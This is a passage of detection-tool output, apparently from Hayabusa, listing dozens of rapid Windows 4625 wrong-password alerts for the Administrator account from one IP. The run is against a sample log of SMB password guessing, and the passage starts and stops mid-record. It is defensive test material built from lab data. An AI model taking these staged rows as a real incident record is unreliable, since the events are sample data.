dIfXRZQkKRJAw4er | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wrqSJPALo5QtUnS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81Mm67AdwpPJMCMm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.035 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jwq5jXlMRU1SNLO5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.076 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d7OYj8ynCEl5dG9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.127 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YzT8vF7ANYnjSRgd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4eYIoww4uL6oYZu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.199 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DpO8L2Fky4zYwp2q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.244 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGmxSy48sphENTiY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.285 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tQVAkjteLFK0hbyE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.330 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMWKsQ8l0j9fZPfA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.381 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ct7xYUYH9sr7mva | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.423 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBn0XxaPOZQokJ0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.463 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nQELRxrGuXqkYgO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.509 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5eT0mykgLNZQygq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.557 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qMyIqRidF6oBdzog | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ULnnFcF98k9zpNTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j5k02pcelZNGwF3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qfcC6LqJqs0EeGjE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXALYkkitmyAFq14 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.780 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIqQmExq22WrW4md | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ydHqjdZhLMI9gjfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.865 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSe45VZNPdovPbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.910 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hiHlcR6qNGE0P7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.950 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iT3jPdHr89RqPlyd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.985 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0QFnABeYK39XEntR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5plMYSBQi5mKmdlk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.113 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TaxWckQUCMgWvCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81xZ7iisEyTABmUm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.187 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qYiQ2xjMQFQwH2XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRN8e3yzZzxc2p3A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.275 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCa6PN0C7XznvipG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.311 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hFqjIXbEb7eWUFUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkrVjLgnJZlIyXpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2r5tyuIYijAXN5be | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.442 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AgjQNe9hQrLIETDn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNoInpFTsixZDIu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.523 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ladJUS6I0HMIwdef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.556 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oW63pJlVtjgn3YY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKNu8b2To2Y1twUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9sN5xm3GytfmM7G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtQQS61GYBm6WUUz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WxxawZZMhNCGHxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.764 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sKP8G2VgJlrr9LMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvOsNQpk3c5p1FgK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.839 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7oz7NPh5Z8UrDPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.890 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvzNFOLBlBv98Do4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.932 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KJmYytO30Icc6Rb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.962 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zro3jLjFXWZ2o8VL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.999 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Z2J8VYeuxd9fKcG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXMjOKLfMex7OmMv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgbm3YeoGxCa22Il | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.123 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7MEstBFjiWhVE18 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.176 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8Y2kDEiMZWf0znn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.213 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBAFVgPIOyCvtdRs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.253 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s3pFhUcspF6lzQXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39LFXXW715pQoADC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.341 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: in4ewyxouUnxQzCQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.374 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOtV8CLIU6Mcw2ty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.412 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8NJqimhGrg9uhTh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XEWLTOY9magV0h6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.497 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Di1MZsJx52Bi8E6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.536 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22MdB2QodynfibkF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qojej3YITXvXJ6Pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.618 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CLjbQ6timbdQoufd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.653 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aZgoAnGEFwXN88bQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.698 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZFWoL9XUMJdfNnY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.747 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x000TRnXfVtPAQSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNHWWHDOpXQyNdrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1irbPdOoUfvq1MXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dCflbKOMPJRXQHsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.942 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zuy6nD4EXeGzEy5e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.984 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xkig4u0LIS9v3HMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.029 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94RbUrUcMf6VhP8A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.069 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X9f7wCJ3wI9RmZTL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.117 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkVs1viGo4RxhFaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKMLt6t01vUDDq1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.254 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYSif8ADOkC8aInB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 